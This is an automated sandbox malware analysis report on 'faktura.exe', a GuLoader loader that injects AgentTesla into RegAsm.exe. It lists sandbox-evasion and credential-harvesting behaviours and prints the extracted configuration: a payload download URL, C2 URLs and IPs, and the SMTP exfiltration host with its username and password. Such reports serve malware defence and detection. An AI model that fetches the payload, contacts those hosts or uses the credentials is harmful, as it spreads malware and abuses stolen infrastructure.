Play interactive tour

Edit tour

Analysis Report faktura.exe

Overview

General Information

Sample Name:	faktura.exe
Analysis ID:	385392
MD5:	4a4501e0665974a9aee852ea13e6e7f6
SHA1:	200399b39a95fa717ccd64e51c7b5515e4b1a3a7
SHA256:	cb4b104a48fd8927dd979c9f7381707470432540161a2be6e1eabcee470020b8
Tags:	GuLoader
Infos:
Most interesting Screenshot:

Detection

AgentTesla GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Potential malicious icon found

Sigma detected: RegAsm connects to smtp port

Yara detected AgentTesla

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Found evasive API chain (trying to detect sleep duration tampering with parallel thread)

Hides threads from debuggers

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains strange resources

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses SMTP (mail sending)

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Startup

System is w10x64

faktura.exe (PID: 7016 cmdline: 'C:\Users\user\Desktop\faktura.exe' MD5: 4A4501E0665974A9AEE852EA13E6E7F6)

RegAsm.exe (PID: 6160 cmdline: 'C:\Users\user\Desktop\faktura.exe' MD5: 529695608EAFBED00ACA9E61EF333A7C)

RegAsm.exe (PID: 6148 cmdline: 'C:\Users\user\Desktop\faktura.exe' MD5: 529695608EAFBED00ACA9E61EF333A7C)

conhost.exe (PID: 3476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=14NOGnWkPLNy6theJEcWu4MGC0ytBSV3L", "Injection Process": ["RegAsm.exe", "RegSvcs.exe", "MSBuild.exe"]}

Threatname: Agenttesla

{"Username: ": "kwiG9npnHBMTywq", "URL: ": "https://kij0jMdbT7S0DxfQ.net", "To: ": "", "ByHost: ": "mail.felgui.pt:587", "Password: ": "5ghXavUhzAY", "From: ": ""}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000003.00000002.904555277.0000000000FA1000.00000040.00000001.sdmp	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
00000003.00000002.908261249.000000001DCC1000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000002.908261249.000000001DCC1000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 6148	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: RegAsm.exe PID: 6148	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 6148	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Click to see the 1 entries

Sigma Overview

System Summary:

Sigma detected: RegAsm connects to smtp port

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 185.31.158.175, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, Initiated: true, ProcessId: 6148, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49773

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000003.00000002.904555277.0000000000FA1000.00000040.00000001.sdmp	Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=14NOGnWkPLNy6theJEcWu4MGC0ytBSV3L", "Injection Process": ["RegAsm.exe", "RegSvcs.exe", "MSBuild.exe"]}
Source: RegAsm.exe.6148.3.memstr	Malware Configuration Extractor: Agenttesla {"Username: ": "kwiG9npnHBMTywq", "URL: ": "https://kij0jMdbT7S0DxfQ.net", "To: ": "", "ByHost: ": "mail.felgui.pt:587", "Password: ": "5ghXavUhzAY", "From: ": ""}

Multi AV Scanner detection for submitted file

Show sources

Source: faktura.exe

Virustotal: Detection: 32%

Perma Link

Source: faktura.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.4:49742 version: TLS 1.2

Source:

Binary string: mscorrc.pdb source: RegAsm.exe, 00000003.00000002.907361254.000000001CC70000.00000002.00000001.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: https://drive.google.com/uc?export=download&id=14NOGnWkPLNy6theJEcWu4MGC0ytBSV3L
Source: Malware configuration extractor	URLs: https://kij0jMdbT7S0DxfQ.net

Source: global traffic

TCP traffic: 192.168.2.4:49773 -> 185.31.158.175:587

Source: Joe Sandbox View

ASN Name: ONILisbonPortugalPT ONILisbonPortugalPT

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic

TCP traffic: 192.168.2.4:49773 -> 185.31.158.175:587

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 3_2_1DB2A09A recv,

3_2_1DB2A09A

Source: unknown

DNS traffic detected: queries for: doc-0o-7c-docs.googleusercontent.com

Source: RegAsm.exe, 00000003.00000002.908261249.000000001DCC1000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: RegAsm.exe, 00000003.00000002.908261249.000000001DCC1000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: RegAsm.exe, 00000003.00000002.908261249.000000001DCC1000.00000004.00000001.sdmp	String found in binary or memory: http://HgEvCf.com
Source: RegAsm.exe	String found in binary or memory: https://drive.google.com/uc?export=download&id=14NOGnWkPLNy6theJEcWu4MGC0ytBSV3L
Source: RegAsm.exe, 00000003.00000002.908354318.000000001DD79000.00000004.00000001.sdmp	String found in binary or memory: https://kij0jMdbT7S0DxfQ.net
Source: RegAsm.exe, 00000003.00000002.908261249.000000001DCC1000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443

Source: unknown

HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.4:49742 version: TLS 1.2

System Summary:

Potential malicious icon found

Show sources

Source: initial sample

Icon embedded in PE file: bad icon match: 20047c7c70f0e004

Source: C:\Users\user\Desktop\faktura.exe	Code function: 0_2_022E384F NtResumeThread,	0_2_022E384F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 3_2_00FA33F9 NtProtectVirtualMemory,	3_2_00FA33F9
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 3_2_00FA384F NtQueryInformationProcess,	3_2_00FA384F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 3_2_1DB2B0BA NtQuerySystemInformation,	3_2_1DB2B0BA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 3_2_1DB2B089 NtQuerySystemInformation,	3_2_1DB2B089

Source: C:\Users\user\Desktop\faktura.exe	Code function: 0_2_004015B8	0_2_004015B8
Source: C:\Users\user\Desktop\faktura.exe	Code function: 0_2_0040827D	0_2_0040827D
Source: C:\Users\user\Desktop\faktura.exe	Code function: 0_2_00405950	0_2_00405950
Source: C:\Users\user\Desktop\faktura.exe	Code function: 0_2_00406351	0_2_00406351
Source: C:\Users\user\Desktop\faktura.exe	Code function: 0_2_022E3BD9	0_2_022E3BD9
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 3_2_00FA3BD9	3_2_00FA3BD9
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 3_2_1DB2283C	3_2_1DB2283C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 3_2_1FEEB5E8	3_2_1FEEB5E8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 3_2_1FEE9989	3_2_1FEE9989
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 3_2_1FEEDC90	3_2_1FEEDC90
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 3_2_20B13B98	3_2_20B13B98
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 3_2_20B145F8	3_2_20B145F8

Source: faktura.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: faktura.exe, 00000000.00000002.686595654.00000000021E0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs faktura.exe
Source: faktura.exe, 00000000.00000002.687182912.0000000002A80000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamelnoverfrslers.exeFE2XPixarPixar vs faktura.exe
Source: faktura.exe, 00000000.00000000.638569648.0000000000415000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamelnoverfrslers.exe vs faktura.exe
Source: faktura.exe	Binary or memory string: OriginalFilenamelnoverfrslers.exe vs faktura.exe

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Section loaded: sfc.dll

Jump to behavior

Source: faktura.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@6/1@2/2

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 3_2_1DB2AF3E AdjustTokenPrivileges,		3_2_1DB2AF3E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 3_2_1DB2AF07 AdjustTokenPrivileges,		3_2_1DB2AF07

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3476:120:WilError_01

Source: faktura.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\faktura.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\faktura.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: faktura.exe

Virustotal: Detection: 32%

Source: unknown	Process created: C:\Users\user\Desktop\faktura.exe 'C:\Users\user\Desktop\faktura.exe'
Source: C:\Users\user\Desktop\faktura.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\faktura.exe'
Source: C:\Users\user\Desktop\faktura.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\faktura.exe'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\faktura.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\faktura.exe'	Jump to behavior
Source: C:\Users\user\Desktop\faktura.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\faktura.exe'	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source:

Binary string: mscorrc.pdb source: RegAsm.exe, 00000003.00000002.907361254.000000001CC70000.00000002.00000001.sdmp

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: 00000003.00000002.904555277.0000000000FA1000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6148, type: MEMORY

Source: C:\Users\user\Desktop\faktura.exe	Code function: 0_2_004070F5 push esi; retf	0_2_004070FA
Source: C:\Users\user\Desktop\faktura.exe	Code function: 0_2_0040894B push esp; retf	0_2_0040894C
Source: C:\Users\user\Desktop\faktura.exe	Code function: 0_2_00404DC1 push es; retf	0_2_00404DC4
Source: C:\Users\user\Desktop\faktura.exe	Code function: 0_2_004053BC pushfd ; ret	0_2_004053C4
Source: C:\Users\user\Desktop\faktura.exe	Code function: 0_2_022E005D pushad ; retf	0_2_022E005E
Source: C:\Users\user\Desktop\faktura.exe	Code function: 0_2_022E016E push ss; ret	0_2_022E016F
Source: C:\Users\user\Desktop\faktura.exe	Code function: 0_2_022E2542 push ecx; ret	0_2_022E254C
Source: C:\Users\user\Desktop\faktura.exe	Code function: 0_2_022E1B5D push cs; retf	0_2_022E1B61
Source: C:\Users\user\Desktop\faktura.exe	Code function: 0_2_022E25F9 push ss; ret	0_2_022E25FA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 3_2_20510D7E push cs; iretd	3_2_20510DDD

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\faktura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\faktura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\faktura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\faktura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\faktura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\faktura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\faktura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
